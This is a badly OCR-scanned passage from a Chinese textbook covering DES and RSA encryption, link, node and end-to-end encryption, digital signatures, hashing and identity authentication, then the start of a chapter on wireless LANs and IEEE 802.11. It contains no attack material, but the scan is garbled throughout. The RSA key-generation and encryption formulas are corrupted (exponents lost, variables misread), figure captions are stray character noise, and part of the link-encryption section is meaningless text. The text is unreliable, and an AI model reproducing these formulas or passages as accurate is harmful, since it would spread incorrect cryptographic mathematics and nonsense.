方案 称 为 加 密 -解密 -加 密 三 重 DES 方案 。 
12.3.5 DES 加 密实 便 


使 用 DES 加 密 软 件 , 对 明文 hello 使 用 密 钥 123 进行 加 密 , 得 到 密 文 为 111001010001011 
1110100000010000110100100110001100110000100101000， 如 图 12-15 所 示 。 


| [请 输入 密 钥 
23 


[11100101000101111101000000100001101001001100 = 
01100110000100101000 


jpello 


图 12-15 ”DES 加 密实 例 


12.4 RSA 公 钥 加 密 技术 
12.4.1 RSA 算法 的 原理 


1978 年 ，Rivest，Shamir 和 Adleman 提出 一 种 用 数论 构造 的 RSA 算法 ， 它 是 迄今 为 
止 在 理论 上 最 为 成 熟 完 善 的 公 钥 密 码 体 制 ， 该 体制 已 经 得 到 广泛 的 应 用 和 实践 。 

RSA 算法 是 一 种 基于 大 数 不 可 能 质 因数 分 解 假设 的 公 钥 体 系 。 简 单 地 说 ， 就 是 找 两 个 
很 大 的 质数 ， 一 个 公开 给 世界 ， 称 之 为 “ 公 钥 ” 另 一 个 不 告诉 任何 人 ， 称 之 为 “ 私 钥 ”。 
两 把 密 钥 互补 一 一 用 公 和 钥 加 密 的 密 文 可 以 用 私 钥 解 密 ， 反 过 来 也 一 样 。 假 设 A 寄 信 给 B， 
他 们 知道 对 方 的 公 钥 。A 可 以 用 B 的 公 钥 加 密 邮 件 寄 出 ，B 收 到 后 用 自己 的 私 钥 解 出 A 的 
原文 ， 这 样 就 保证 了 邮件 的 安全 性 。RSA 算法 如 图 12-16 所 示 。 


选 两 个 大 素数 p 和 4 


np*g 


| [选择 一个 整数 
pnp-D(q-D) a 


dxe=] mody (n) 


1 
fe， 站 为 公 钥 ，{d， 为 私 钥 
e n 公 n 第 
图 12-16 RSA 算法 框图 12 
和 
于 


个 各 加 绍 与 以 证 蕉 大 


克 乡 委 会 贡 大 理论 与 笑 践 


1. RSA 算法 的 密 钥 的 产生 

(1) 选 两 个 大 素数 p 和 gq。 

(2) 计算 这 两 个 素数 的 乘积 n=pXgq，Wn)(p-1)(g-1)， 其 中 Gg(m) 是 n 的 欧 拉 函数 值 。 

(3) 选择 一 个 整数 e， 满足 1<e<g(D)， 并 且 gcd(e, $(n))=1， 也 就 是 e 和 Gg (n) 互 质 。 

(4) 计算 d， 满 足 d，e=] modg (n)。 

(5) 以 fe， 为 公 钥 ，{4d，n)} 为 私 钥 。 

2. RSA 算法 的 加 密 

(1) 将 明文 分 组 ， 使 得 每 个 分 组 对 应 的 十 进 制 数 小 于 n; 

(2) 对 每 个 分 组 明文 m， 做 加 密 运 算 : c=m* mod n。 

3. RSA 算法 的 解密 

对 每 个 分 组 密 文 ， 做 解密 运算 : m= cmod n。 
12.4.2 RSA 的 安全 性 

RSA 算法 的 安全 性 依赖 于 大 数 分 解 , 但 是 否 等 同 于 大 数 分 解 一 直 未 能 得 到 理论 上 的 证 
明 , 因为 没有 证 明 破解 RSA 算法 就 一 定 需 要 做 大 数 分 解 。 假设 存在 一 种 无 需 分 解 大 数 的 算 
法 ， 那 它 肯 定 可 以 修改 成 为 大 数 分 解 算 法 。 目 前 ，RSA 算法 的 一 些 变种 算法 已 被 证 明 等 价 
于 大 数 分 解 ， 不 管 怎样 , 分解 n 是 最 显然 的 攻击 方法 。 为 了 避免 整数 分 解 算法 对 RSA 公 钥 
密码 系统 的 攻击 ， 必 须 慎重 选择 RSA 大 整数 ， 例 如 RSA 大 整数 n=p*q 必须 足够 大 ， 以 抵 
抗 数据 域 筛 法 的 分 解 , 与 4 的 位 数 应 差不多 ， 以 抵抗 椭圆 曲线 算法 的 分 解 。 由 此 可 见 ， 
由 于 分 解 大 整数 的 能 力 日 益 增强 ， 因 此 为 保证 RSA 体制 的 安全 性 必须 增加 pp 与 gq 的 位 数 。 
12.4.3 RSA 与 DES 的 比较 


非 对 称 加 密 具 有 更 大 的 密 钥 空间 或 可 能 值 范 围 ， 因 此 不 太 容易 受到 对 每 个 可 能 密 钥 都 
进行 尝试 的 穷 举 攻击 。 由 于 公 钥 不 需要 保密 ， 因 此 分 发 起 来 十 分 容易 ， 但 条 件 是 可 通过 某 
种 其 他 方式 来 验证 发 送 方 的 身份 。 某 些 非 对 称 加 密 算 法 可 用 于 创建 数字 签名 ， 以 此 来 验证 
数据 发 送 方 的 身份 。 但 是 ， 与 对 称 加 密 算 法 相 比 非 对 称 加 密 的 速度 很 慢 ， 不 适合 用 来 加 密 
大 量 数 据 。 非 对 称 加 密 算 法 仅 对 传输 很 少量 的 数据 有 用 。 非 对 称 加 密 通 常用 于 加 密 一 个 对 
称 加 密 将 要 使 用 的 密 钥 ， 而 对 会 话 的 其 余部 分 应 用 对 称 加 密 。 

对 称 加 密 与 非 对 称 加 密 都 各 自 具有 优点 和 缺点 , 现 对 两 种 加 密 算法 进行 比较 ,如 表 12-1 
所 示 。 


表 12-1 DES 与 RSA 比较 表 


算法 密 钥 关 系 密 钥 的 传送 。 数字 签名 ” 加密 速 度 。 主要 用 途 
DES ”加 密 密 钥 与 解密 密 钥 相同 ”不 需 困难 快 数据 加 密 
RSA ”加 密 密 钥 与 解密 密 钥 不 同 ” 需要 容易 慢 数字 签名 、 密 钥 分 配 加 密 


对 称 加 密 算法 加 密 速度 快 ， 但 密 钥 的 管理 存在 安全 性 问题 ， 非 对 称 加 密 算法 密 钥 管理 
简单 ， 尤其 是 RSA 加 密 算法 易于 理解 ,实现 简单 ， 安 全 性 良好 ,而 且 已 经 有 大 量 针对 RSA 
算法 的 改进 方法 可 以 应 用 。 


12.5 ”信息 加 密 技术 应 用 
在 网 络 安全 领域 ， 网 络 数据 加 密 是 解决 通信 网 中 信息 安全 的 有 效 方法 。 常 用 的 网 络 数 
据 加 密 方式 主要 有 链 路 加 密 、 节 点 加 密 和 端 到 端 加 密 。 
12.5.1 和 链 路 加 密 
链 路 加 密 是 对 网 络 中 两 个 相 邻 节点 之 间 传 输 的 数据 进行 加 密 保护 ， 如 图 12-17 所 示 。 
对 于 链 路 加 密 ， 所 有 消息 在 被 传输 之 前 进行 加 密 ， 在 每 一 个 节点 对 接收 到 的 消息 进行 解密 


后 ， 然 后 先 使 用 下 一 链 路 的 密 钥 对 消息 进行 加 密 ， 再 进行 传输 。 在 到 达 目 的 地 之 前 ， 一 条 
消息 可 能 要 经 过 多 条 通信 链 路 的 传输 。 


节点 0 节点 1 节点 2 节点 n 


EV EV 0) 
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图 12-17 链 路 加 密 


由 于 在 每 一 个 中 间 传 输 节 点 ， 消 息 均 被 解密 后 重新 进行 加 密 ， 因 此 ， 包 括 路 由 信息 在 
内 的 链 路 上 的 所 有 数据 均 以 密 文 形 式 出 现 。 这 样 ， 链 路 加 密 就 掩盖 了 被 传输 消息 的 源 点 与 
终点 。 由 于 填充 技术 的 使 用 及 填充 字符 在 不 需要 传输 数据 的 情况 下 就 可 以 进行 加 密 ， 这 使 
得 消息 的 频率 和 长 度 特性 得 以 掩盖 ， 从 而 可 以 防止 对 通信 业务 进行 分 析 。 

尽管 链 路 加 密 在 计算 机 网 络 环境 中 广泛 使 用 ， 但 也 存在 一 些 问题 。 链 路 加 密 通 常用 在 
点 对 点 的 同步 或 异步 线路 上 ， 它 要 求 先 对 链 路 两 端的 加 密 设 备 进行 同步 ， 然 后 使 用 一 种 链 
模式 对 链 路 上 传输 的 数据 进行 加 密 ， 这 就 给 网 络 的 性 能 和 可 管理 性 带 来 了 副作用 。 在 线路 
六 号 连通 性 不 好 的 海外 或 卫星 网 络 中 ， 链 路 上 的 加 密 设备 需要 频繁 地 进行 同步 ， 带 来 的 后 
果 是 数据 丢失 或 重 传 。 因 此 ， 即 使 一 小 部 分 数据 需要 进行 加 密 ， 也 会 使 得 所 有 传输 数据 需 
要 重新 加 密 。 

在 一 个 网 络 节 点 ， 链 路 加 密 仅 在 通信 链 路 上 提供 安全 性 ， 消 息 以 明文 形式 存在 ， 因 此 
所 百名 在 物理 上 才 硕 避 安 全 的 ， 下 放 训 全 失 亲 如 声 册 穴 。 交管 二 的 生物 加密 第 法 中 。 解 
密 密 钥 与 加 密 密 钥 是 相同 的 ， 该 密 钥 必须 被 秘密 保存 ， 并 按 一 定 规则 进行 变化 。 这 样 ， 密 
如 办 了 在 链 叶 并 对 容 锐 迁 行 和 各 入 送 世 者 建立 专用 问 络 说 滩 ， 网 络 点 地 理 分 布 的 广阔 性 
使 得 这 一 过 程 变 得 复杂 ， 同 时 增加 了 密 钥 连续 分 配 时 的 代价 。 
12.5.2 节点 加 密 

节点 加 密 是 指 在 信息 传输 路 过 的 节点 处 进行 解密 和 加 密 。 尽 管 节点 加 密 能 给 网 络 数据 
提供 较 高 的 安全 性 ， 但 它 在 操作 方式 上 与 链 路 加 密 是 类 似 的 ， 两 者 均 在 通信 链 路 上 为 传输 


的 消息 提供 安全 性 ， 都 在 中 间 节点 先 对 消息 进行 解密 ， 然 后 进行 加 密 。 因 为 要 对 所 有 传输 | 第 
的 数据 进行 加 密 ， 所 以 加 密 过 程 对 用 户 是 透明 的 。 然 而 ， 与 链 路 加 密 不 同 的 是 ， 节 点 加 密 “| 12 
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不 允许 消息 在 网 络 节点 以 明文 形式 存在 ， 它 先 把 收 到 的 消息 进行 解密 ， 然 后 采用 另 一 个 不 
同 的 密 钥 进行 加 密 ， 这 一 过 程 是 在 节点 上 的 一 个 安全 模块 中 进行 的 。 

节点 加 密 要 求 报头 和 路 由 信息 以 明文 形式 传输 ， 以 便 中 间 节 点 能 得 到 如 何 处 理 消息 的 
信息 ， 因 此 这 种 方法 对 于 防止 攻击 者 分 析 通 信 业 务 是 脆弱 的 。 
12.5.3” 端 到 端 加 密 

端 到 端 加 密 是 指 对 一 对 用 户 之 间 的 数据 连续 地 提供 保护 ， 如 图 12-18 所 示 。 端 到 端 加 
密 允 许 数据 在 从 源 点 到 终点 的 传输 过 程 中 始终 以 密 文 形式 存在 。 采 用 端 到 端 加 密 ， 消 息 在 
被 传输 到 达 终点 之 前 不 进行 解密 ， 因 为 消息 在 整个 传输 过 程 中 均 受到 保护 ， 所 以 即使 有 节 
点 被 损坏 也 不 会 使 消息 泄漏 。 
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链 路 1 芝 链 路 2 这 链 路 7 


图 12-18 ” 端 到 端 加 密 


端 到 端 加 密 系 统 的 价格 便宜 ， 且 与 链 路 加 密 和 节点 加 密 相 比 更 可 靠 ， 更 容易 设计 、 实 
现 和 维护 。 端 到 端 加 密 还 避免 了 其 他 加 密 系统 所 固有 的 同步 问题 ， 因 为 每 个 报 文 包 均 是 独 
立 被 加 密 的 ， 所 以 一 个 报 文 包 所 发 生 的 传输 错误 不 会 影响 后 续 的 报 文 包 。 此 外 ， 从 用 户 对 
安全 需求 的 直觉 上 讲 ， 端 到 端 加 密 更 自然 。 

端 到 端 加 密 系统 通常 不 允许 对 消息 的 目的 地 址 进行 加 密 ， 这 是 因为 每 一 个 消息 所 经 过 
的 节点 都 要 用 此 地 址 来 确定 如 何 传输 消息 。 由 于 这 种 加 密 方 法 不 能 掩盖 被 传输 消息 的 源 点 
与 终点 ， 因 此 它 对 于 防止 攻击 者 分 析 通 信 业 务 也 是 脆弱 的 。 


12.6 认证 技术 
数据 加 密 是 密码 技术 应 用 的 重要 领域 。 在 认证 技术 中 ， 密 码 技 术 也 同样 发 挥 着 它 的 重 


要 作用 ， 但 它们 的 应 用 目的 不 同 。 加 密 是 为 了 隐藏 消息 的 内 容 ， 而 认证 的 目的 有 三 个 : 
QD 消息 完整 性 认证 ， 即 验证 信息 在 传送 或 存储 过 程 中 是 否 被 算 


改 ;加 身份 认证 ， 即 验证 消息 的 接收 者 是 否 持 有 正确 的 身份 认 安全 管理 协议 
证 符 ， 如 口令 、 密 钥 等 ，@ 消 息 的 序号 和 操作 时 间 等 的 认证 ， | 


其 目的 是 防止 消息 重 放 或 延迟 等 攻击 。 认 证 技术 是 防止 不 法 分 
子 对 信息 系统 进行 主动 攻击 的 一 种 重要 技术 。 


12.6.1 认证 技术 的 分 层 模 型 | 


密码 体制 
如 图 12-19 所 示 ， 认 证 技术 可 以 分 为 三 个 层次 : 安全 管理 
协议 、 认 证 体制 和 密码 体制 。 安 全 管理 协议 的 主要 任务 是 在 安 。 图 12-19 认证 技术 层次 模型 


认证 体制 


全 体制 的 支持 下 ， 建 立 、 强 化 和 实施 整个 网 络 系统 的 安全 策略 ;认证 体制 在 安全 管理 协议 
的 控制 和 密码 体制 的 支持 下 完成 各 种 认证 功能 ;密码 体制 是 认证 技术 的 基础 ， 它 为 认证 体 
制 提供 数学 方法 的 支持 。 

一 个 安全 的 认证 体制 应 该 至 少 满足 以 下 要 求 。 

(1) 消息 的 接收 者 能 够 检验 和 证 实 消息 的 合法 性 、 真 实 性 和 完整 性 。 

(2) 消息 的 发 送 者 对 所 发 的 消息 不 能 抵赖 ， 有 时 也 要 求 消息 的 接收 者 不 能 否认 收 到 的 
消息 。 

(3) 除了 合法 的 消息 发 送 者 外 ， 其 他 人 不 能 伪造 发 送 消息 。 


12.6.2 数字 签名 技术 


数据 加 密 可 以 防止 信息 在 传输 过 程 中 被 截获 ， 而 如 何 确定 发 送 人 的 身份 问题 ， 需 要 使 
用 数字 签名 技术 来 解决 。 

1. 数字 签名 的 基本 概念 

亲笔 签名 是 用 来 保证 文件 或 资料 真实 性 的 一 种 方法 。 在 网 络 环境 中 ， 通 常 使 用 数字 签 
名 技术 来 模拟 日 常生 活 中 的 亲笔 签名 。 数 字 签 名 将 信息 发 送 人 的 身份 与 信息 传送 结合 起 来 ， 
可 以 保证 信息 在 传输 过 程 中 的 完整 性 ， 并 提供 信息 发 送 者 的 身份 认证 ， 以 防止 信息 发 送 者 
抵赖 行为 的 发 生 。 

目前 各 国 已 经 制定 了 相应 的 法 律 、 法 规 ， 把 数字 签名 作为 执法 的 依据 。 利 用 非 对 称 加 
密 算 法 〈 例 如 RSA 算法 ) 进行 数字 签名 是 最 常用 的 方法 。 

2. 数字 签名 的 工作 原理 

利用 非 对 称 加 密 算法 进行 数字 签名 时 ， 由 于 其 效率 比较 低 ， 并 对 加 密 的 信息 块 长 度 有 
一 定 的 限制 ， 因 此 在 使 用 非 对 称 加 密 算法 进行 数字 签名 前 ， 通 常 先 使 用 单 向 散 列 函数 
(hashing function)， 对 要 签名 的 信息 进行 处 理 生成 信息 摘要 ， 然 后 对 信息 摘要 进行 签名 。 
图 12-20 给 出 了 数字 签名 的 工作 原理 示意 图 。 


接收 方 
人 数 


信息 
单 向 散 列 函数 外国 
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站 | 信息 | | EE 急 是 十- 搞 要 
生成 摘要 | 摘要 | 加 密 过 禹 
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发 送 方 公 钥 
(a) (b) 
图 12-20 ”数字 签名 工作 原理 
数字 签名 的 具体 工作 过 程 为 : 


(1) 发 送 方 使 用 单 向 散 列 函数 对 要 发 送 的 信息 进行 运算 ， 生 成 信息 摘要 ; 
(2) 发 送 方 使 用 自己 的 私 铀 ， 利 用 非 对 称 加 密 算 法 ， 对 生成 的 信息 进行 数字 签名 ; 


大 入 加 殉 与 双 证 下 大 


司 经 颁 会 扩大 理 雁 与 笑 跷 


(3) 发 送 方 通过 网 络 将 信息 本 身 和 已 进行 数字 签名 的 信息 摘要 发 送 给 接收 方 ; 

(4) 接收 方 使 用 与 发 送 方 相同 的 单 向 散 列 函数 ， 对 收 到 的 信息 进行 运算 ， 重 新 生成 信 
息 摘 要 ; 

(5) 接收 方 使 用 发 送 方 的 公 钥 对 接收 的 信息 摘要 解密 ; 

(6) 将 解密 的 信息 摘要 与 重新 生成 的 信息 摘要 进行 比较 ， 以 判断 信息 在 发 送 过 程 中 是 
否 被 算 改 过 ; 

(7) 利用 数字 签名 可 以 保证 信息 传输 过 程 中 数据 的 完整 性 ， 并 实现 对 发 送 者 的 身份 认 
证 ， 防 止 信息 交换 中 的 抵赖 现象 的 发 生 。 

实际 上 ， 计 算出 信息 摘要 后 ， 使 用 公开 密 钥 法 对 其 加 密 〈 用 私 钥 )， 就 生成 了 数字 
签名 。 

3， 信息 摘要 

信息 摘要 是 通过 一 个 单 向 散 列 函数 (hash)， 将 一 段 可 变 长 度 的 明文 转换 成 的 一 个 固定 
长 度 的 比特 串 〈 散 列 码 )， 签 名 时 只 需要 对 这 个 固定 长 度 的 比特 串 签 名 就 可 以 了 。 

散 列 码 是 报 文 所 有 比特 的 函数 值 ， 当 报 文中 任意 一 比特 或 若干 比特 发 生 改变 时 ， 都 将 
导致 散 列 码 发 生变 化 ， 因 此 也 称 为 信息 的 数字 指纹 。 

不 同 内 容 的 信息 数据 形成 相同 摘要 值 的 概率 几乎 为 零 ， 根 据 搞 要 值 无 法 还 原 原 数据 。 
用 于 数字 签名 的 单 向 散 列 函数 必须 满足 以 下 4 个 重要 的 特性 。 

(1) 给 定 信息 M， 通 过 信息 摘要 算法 MD 很 容易 计算 出 MD (M)。 

(2) 给 定 MD (M)， 几 乎 无 法 找 出 M〈 单 向 性 )。 

(3) 给 定 M， 无 法 找 出 另 一 个 M'， 使 得 MD (M) =MD (M' ) ( 即 不 可 能 存在 两 条 
有 具 有 同样 信息 摘要 的 不 同 信息 )， 为 满足 这 一 点 散 列 码 至 少 应 为 128 比特 长 。 

(4) 输入 的 微小 变化 应 导致 输出 有 很 大 的 变化 。 

目前 ， 使 用 最 广泛 的 信息 摘要 算法 是 MD5 算法 和 SHS 算法 。 


12.6.3 身份 认证 技术 


身份 认证 的 目的 是 验证 信息 收发 方 是 否 持 有 合法 的 身份 认证 符 ， 包 括 口令 、 密 钥 和 实 
物证 件 等 。 从 认证 机 制 上 讲 ， 身 份 认证 技术 可 分 为 两 类 : 一 类 是 专门 进行 身份 认证 的 直接 
身份 认证 技术 ， 另 一 类 是 在 消息 签名 和 加 密 认 证 过 程 中 ， 通 过 检验 收发 方 是 否 持 有 合法 的 
密 钥 进行 的 认证 ， 称 为 间接 身份 认证 技术 。 

在 用 户 接 入 系统 时 ， 直 接 身 份 认证 技术 要 首先 验证 他 是 否 持 有 合法 的 身份 证 ， 包 括 口 
令 或 实物 证 件 等 。 如 果 他 有 合法 的 身份 证 ， 就 允许 他 接 入 系统 中 ,进行 允许 的 收发 等 操作 ， 
否则 就 拒绝 接 入 系统 。 通 信和 数据 系统 的 安全 性 常常 取决 于 能 否 正确 识别 通信 用 户 或 终端 
的 个 人 身份 。 对 计算 机 的 访问 和 使 用 及 安全 地 区 的 出 入 放行 等 都 以 准确 的 身份 认证 作为 基础 。 

进入 信息 社会 ， 传 统 的 身份 认证 方法 诸如 户籍 管理 、 身 份 证 制度 以 及 单位 机 构 的 证 件 
和 图 章 等 ， 都 已 不 能 适应 时 代 的 要 求 。 虽 然 有 不 少 学 者 试图 电子 化 生物 唯一 识别 信息 ， 如 
指纹 、 视 网 膜 等 ， 但 由 于 代价 高 ， 准 确 性 低 ， 存 储 空间 大 和 传输 效率 低 ， 不 适合 计算 机 读 
取 和 判别 ， 只 能 作为 辅助 措施 应 用 。 而 使 用 密码 技术 ， 特 别 是 公 钥 密码 技术 ， 能 够 设计 出 
安全 性 高 的 识别 协议 。 

身份 认证 常用 的 方式 主要 有 两 种 ， 通 行 字 方 式 和 持 证 方式 。 

1. 通行 字 方 式 

通行 字 方式 是 使 用 最 广泛 的 一 种 身份 认证 技术 ， 比 如 通信 网 的 接 入 协议 等 。 通 行 字 一 


般 为 数字 、 字 母 和 特殊 字符 等 组 成 字符 串 。 通 行 字 识别 的 方法 是 : 被 认证 者 先 输入 他 的 通 
行 字 ， 然 后 计算 机 确定 它 的 正确 性 。 被 认证 者 和 计算 机 都 知道 这 个 秘密 的 通行 字 ， 每 次 登 
录 时 ， 计 算 机 都 要 求 输入 通行 字 ， 这 样 就 要 求 计算 机 存储 通行 字 ， 一 旦 通行 字 文件 暴露 ， 
攻击 者 就 有 机 可 乘 。 为 此 ， 人 们 采用 单 向 函数 来 克服 这 种 缺陷 ， 此 时 ， 计 算 机 存储 通行 字 
的 单 向 函数 值 而 不 是 存储 通行 字 ， 其 认证 过 程 如 下 : 

(1) 被 认证 者 将 他 的 通行 字 输 入 计算 机 ; 

(2) 计算 机 完成 通行 字 的 单 向 函数 值 计算 ; 

(3) 计算 机 把 单 向 函数 值 和 存储 的 值 做 比较 。 

由 于 计算 机 不 再 存储 每 个 人 的 有 效 通 行 字 表 ， 即 使 攻击 者 侵入 计算 机 也 无 法 从 通行 字 
的 单 向 函数 值 表 中 获得 通行 字 ， 当 然 这 种 保护 也 抵抗 不 住 字典 式 攻 击 。 

2. 持 证 方式 

持 证 方式 是 一 种 实物 认证 方式 。 持 证 是 一 种 个 人 持 有 物 ， 它 的 作用 类 似 于 钥匙 ， 用 于 
启动 电子 设备 。 使 用 较 多 的 是 一 种 嵌 有 磁 条 的 塑料 卡 ， 磁 条 上 记录 有 用 于 计算 机 识别 的 个 
人 识别 号 。 这 类 卡 易 于 伪造 ， 因 此 产生 了 一 种 被 称 做 “智能 卡 ” 的 集成 电路 卡 来 代替 普通 
的 磁卡 。 智 能 卡 已 经 成 为 目前 身份 认证 的 一 种 更 有 效 、 更 安全 的 方法 。 

智能 卡 仅 仅 为 身份 认证 提供 一 个 硬件 基础 ， 要 想得到 安全 的 识别 ， 还 需要 与 安全 协议 
配套 使 用 。 

在 网 络 中 经 常 需要 认证 用 户 的 身份 ， 例 如 访问 控制 。 网 络 用 户 的 身份 认证 可 以 通过 以 
下 三 种 基本 途径 之 一 或 它们 的 组 合 来 实现 。 

(1) 用 户 的 密码 、 口 令 等 。 

(2) 用 户 的 身份 证 、 护 照 及 信用 卡 等 。 

(3) 用 户 的 个 人 特征 〈characteristics): 人 的 指纹 、 声 音 、 笔 迹 、 手 型 、 脸 型 、 血 型 、 
视网膜 、 虹 膜 、DNA 以 及 个 人 动作 方面 的 特征 等 。 

自动 身份 认证 系统 需要 根据 安全 要 求 和 用 户 可 接受 的 程度 以 及 成 本 等 因素 ， 选 择 适 当 
的 组 合 来 设计 。 

在 安全 性 要 求 较 高 的 系统 中 ， 由 口令 和 证 件 等 提供 的 安全 保障 是 不 完善 的 。 口 令 可 能 
被 泄露 ， 证 件 可 能 丢失 或 伪造 。 更 高 级 的 身份 验证 是 根据 用 户 的 个 人 特征 进行 确认 ， 它 是 
一 种 可 信和 度 高 ， 而 又 难于 伪造 的 验证 方法 。 

广义 的 生物 统计 学 正在 成 为 网 络 环境 中 个 人 身份 认证 技术 中 的 最 简单 而 安全 的 方法 。 
它 是 利用 个 人 所 特有 的 生理 特征 来 设计 的 。 个 人 特征 包括 很 多 ， 如 容貌 、 肤 色 、 发 质 、 身 
材 、 手 印 、 指 纹 、 脚 印 、 层 印 、 颅 相 、 口 音 、 视 网 膜 、 血 型 、DNA、 笔 迹 及 习惯 性 签字 等 。 
当然 ， 采 用 哪 种 方式 还 要 看 是 否 能 够 方便 地 实现 ， 以 及 是 不 是 能 够 被 用 户 所 接受 。 个 人 特 
征 不 会 丢失 且 难 于 伪造 ， 适 用 于 高 级 别 个 人 身份 认证 。 因 此 ， 将 生物 统计 学 与 网 络 安全 、 
身份 认证 有 机 结合 起 来 是 网 络 安全 技术 需要 解决 的 一 个 重要 问题 。 


思考 与 练习 
1， 简 述 对 称 加 密 算法 的 基本 原理 。 


2. 利用 对 称 加 密 算 法 对 hello 进行 加 密 ， 并 进行 解密 。 
3. 比较 对 称 加 密 算 法 和 公开 密 钥 算法 ， 分 析 它 们 的 异同 。 


信息 加 绽 与 以 证 蕉 大 


第 13 章 无 线 网 络 安全 


本 章 学 习 目标 : 

。 了 解 无 线 局 域 网 的 基本 概念 ; 

了 解 无 线 网 络 面临 的 安全 威胁 ; 
掌握 物理 地 址 (MAC ) 过 滤 ; 
掌握 服务 区 标识 符 ( SSID ) 匹配 ; 
掌握 WEP 加 密 解密 过 程 。 


13.1 无 线 局 域 网 (WLAN) 


无 线 局 域 网 提供 了 移动 接 入 的 功能 ， 这 就 给 许多 需要 发 送 数据 但 又 不 能 坐 在 办 公 室 的 
工作 人 员 提 供 了 方便 。 当 大 量 持 有 便携 式 电 脑 的 用 户 都 在 同一 个 地 方 同时 要 求 上 网 时 (如 
在 临时 地 点 的 会 议 、 野 外 等 )， 如 果 采 用 电缆 连 网 ， 布 线 就 是 个 很 大 的 问题 ， 这 时 采用 无 线 
局 域 网 就 比较 容易 。 无 线 局 域 网 还 有 投资 少 ， 建 网 的 速度 比较 快 等 优点 。 

无 线 局 域 网 是 计算 机 网 络 与 无 线 通信 技术 相 结合 的 产物 。 它 利用 射频 (RF) 技术， 取 
代 旧 式 的 双 绞 铜 线 构成 局 域 网 ， 提 供 传统 有 线 局 域 网 的 所 有 功能 。 

无 线 局 域 网 的 发 展 经 历 了 两 个 阶段 : IEEE 802.11 标准 出 台 以 前 各 个 标准 互 不 兼容 的 阶 
段 和 IEEE 802.11 标准 问世 后 的 无 线 网 络 产品 规范 化 阶段 。IEEE 802.11 标准 代表 了 无 线 网 
所 需要 具备 的 特点 。 无 线 局 域 网 有 两 种 配置 实现 方案 : 有 基站 或 者 没有 基站 。IEEE 802.11 
标准 对 这 两 种 方案 都 提供 了 支持 ， 凡 使 用 IEEE 802.11 系列 协议 的 局 域 网 又 称 为 Wi-Fi 
(Wireless-Fidelity )。 

1. IEEE 802.11 基站 结构 模型 

IEEE 802.11 标准 规定 无 线 局 域 网 的 最 小 构件 是 基本 服务 集 BSS (Basic Service Set)。 
一 个 基本 服务 集 BSS 包括 一 个 基站 和 若干 个 使 用 相同 MAC 协议 竞争 共享 媒体 的 移动 站 ， 
所 有 的 站 在 本 BSS 以 内 都 可 以 直接 通信 ,但 在 和 本 BSS 以 外 的 站 通信 时 都 必须 通过 本 BSS 
的 基站 。 基 本 服务 集 内 的 基站 BS (Base Station) 就 是 接 入 点 AP (Access Point)。 

一 个 基本 服务 集 可 以 是 孤立 的 ， 也 可 通过 接 入 点 AP 连接 到 一 个 分 配 系 统 DS 
(Distribution System)， 然 后 再 连接 到 另 一 个 基本 服务 集 ， 这 样 就 构成 了 一 个 扩展 的 服务 集 
ESS (Extended Service Set)。 分 配 系统 可 以 使 用 以 太 网 〈 这 是 最 常用 的 )、 点 对 点 链 路 或 其 
他 无 线 网 络 。 扩 展 服务 集 ESS 可 以 为 无 线 用 户 提供 到 有 线 局 域 网 的 接 入 。 这 种 接 入 是 通过 
无 线 网 桥 来 实现 的 。 

2. 自 组 网 络 

没有 基站 的 无 线 局 域 网 又 叫做 自 组 网 络 (ad hoc network)。 这 种 自 组 网 络 没 有 上 述 基 


本 服务 集中 的 接 入 点 AP， 而 是 由 一 些 处 于 平等 状态 的 站 之 间 相互 通信 组 成 的 临时 网 络 。 
在 ad hoc 网 中 ， 源 节点 和 目标 节点 之 间 的 其 他 节点 为 转发 节点 ， 这 些 节 点 都 具有 路 由 器 的 
功能 。 由 于 自 组 网 络 没 有 预先 建 好 的 网 络 固定 基础 设施 (基站), 因此 自 组 网 络 的 服务 范围 
通常 是 受 限 的 ， 而 且 自 组 网 络 一 般 也 不 和 外 界 的 其 他 网 络 相 连接 。 自 组 网 络 有 很 好 的 应 用 
前 景 ， 例 如 战场 指挥 、 灾 害 场景 、 移 动 会 议 、 传 感 器 网 络 等 。 

近年 来 ， 无 线 传 感 器 网 络 WSN (Wireless Sensor Network) 引起 了 人 们 广泛 的 关注 。 
无 线 传感器 网 络 是 由 大 量 传感器 节点 通过 无 线 通信 技术 构成 的 自 组 网 络 。 无 线 传感器 网 络 
的 应 用 就 是 进行 各 种 数据 的 采集 、 处 理 和 传输 ， 一 般 并 不 需要 很 高 的 带宽 ， 但 是 在 大 部 分 
时 间 必 须 保 持 低 功 耗 ， 以 节省 电池 的 消耗 。 由 于 无 线 传 感 节点 的 存储 容量 受 限 ， 因 此 对 协 
议 栈 的 大 小 有 严格 的 限制 。 

无 线 传 感 器 网 络 中 的 节点 基本 上 是 固定 不 变 的 ， 这 点 和 移动 自 组 网 络 有 很 大 的 区 别 。 
无 线 传感器 网 络 主要 的 应 用 领域 是 : 环境 监测 与 保护 (如 洪水 预报 ); @ 战 争 中 的 敌情 监 
控 ， @ 医 疗 中 的 病房 监测 和 患者 护理 监测 ，@ 在 危险 的 工业 环境 中 的 安全 监测 (如 井下 瓦 
斯 的 监控 )，@ 城 市 交通 管理 和 建筑 内 的 温度 、 照 明 、 安 全 监控 等 。 

3. IEEE 802.11 服务 

IEEE 802.11 定义 了 标准 无 线 LAN 必须 提供 的 9 种 服务 。 这 些 服务 可 以 分 成 两 类 : 5 
种 分 发 服务 和 4 种 站 服务 。 分 发 服务 涉及 到 对 BSS 的 成 员 关 系 的 管理 ,并 且 会 影响 到 BSS 
之 外 的 站 。 与 之 相反 ， 站 服务 则 只 与 一 个 BSS 内 部 的 活动 有 关系 。 

5 种 分 发 服务 是 由 基站 提供 的 ， 它 们 处 理 站 的 移动 性 : 当 移 动 站 进入 BSS 的 时 候 ， 通 
过 这 些 服务 与 基站 关联 起 来 ， 当 移动 站 离开 BSS 的 时 候 ， 通 过 这 些 服 务 与 基站 断 开 联系 。 
这 5 种 分 发 服务 如 下 。 

1) 关联 

移动 站 利用 关联 association) 服务 连接 到 基站 上 。 典 型 情况 下 ， 当 一 个 移动 站 进入 到 
一 个 基站 的 无 线 电 距 离 范围 之 内 的 时 候 ， 这 种 服务 就 会 被 用 到 。 

2) 分 离 

不 管 是 移动 站 ， 还 是 基站 ， 都 有 可 能 会 解除 关联 关系 。 一 个 站 在 离开 或 者 关闭 之 前 ， 
先 使 用 分 离 〈disassociation) 服务 ;基站 在 停 下 来 进行 维护 之 前 也 可 能 会 用 到 该 服务 。 

3) 重新 关联 

利用 重新 关联 (reassociation) 服务 ， 一 个 站 可 以 改变 它 的 首选 基站 。 这 项 服务 对 于 那 
些 从 一 个 BSS 移动 到 另 一 个 BSS 中 的 移动 站 来 说 ， 是 非常 有 用 的 。 

4) 分 发 

